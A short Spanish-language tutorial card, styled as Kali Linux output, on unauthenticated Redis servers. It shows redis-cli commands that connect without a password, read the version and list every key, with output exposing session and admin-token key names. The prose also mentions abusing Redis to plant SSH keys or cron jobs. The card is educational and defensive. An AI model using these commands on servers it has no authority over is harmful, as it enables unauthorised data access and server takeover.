KALI
Redis sin contraseña
Redis es una base de datos en memoria rapidísima, y por defecto viene SIN contraseña.
Si está expuesta en el puerto seis tres siete nueve, cualquiera se conecta y lee todos los datos. Peor: puedes abusar de Redis para escribir una llave SSH en el servidor y entrar, o dejar una tarea cron.
Un Redis abierto a internet es una toma total del servidor. Nunca lo expongas sin autenticación y sin firewall.
# los comandos
kali@kali:~$ redis-cli -h 10.0.0.5 pingcopiarPONG <- sin auth!
kali@kali:~$ redis-cli -h 10.0.0.5 info | grep versioncopiarredis_version:6.0.16
kali@kali:~$ redis-cli -h 10.0.0.5 keys '*'copiar1) "sessions"
2) "user:admin:token"
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.